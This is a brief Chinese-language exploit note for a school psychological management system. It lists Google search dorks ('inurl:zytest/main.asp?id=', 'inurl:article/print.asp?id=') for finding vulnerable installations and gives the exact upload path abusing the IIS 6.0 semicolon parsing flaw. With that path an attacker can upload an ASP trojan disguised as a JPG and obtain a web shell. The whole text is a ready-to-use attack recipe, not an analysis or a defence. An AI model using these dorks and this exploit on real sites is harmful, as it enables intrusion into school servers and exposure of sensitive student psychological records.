心海學(xué)校心理管理系統(tǒng)
漏洞類(lèi)型:上傳漏洞(IIS解析漏洞)
關(guān)鍵詞 :1.inurl:zytest/main.asp?id=
2.心理 inurl:article/print.asp?id=
漏洞描述:由于IIS6.0存在解析漏洞,所以本漏洞利用方式工作于windows 系統(tǒng)平臺(tái)IIS6.0下的
漏洞利用:inc/upload.asp?fl=1.asp;1 上傳jpg格式的asp木馬,得到shell upload/1.asp;1.jpg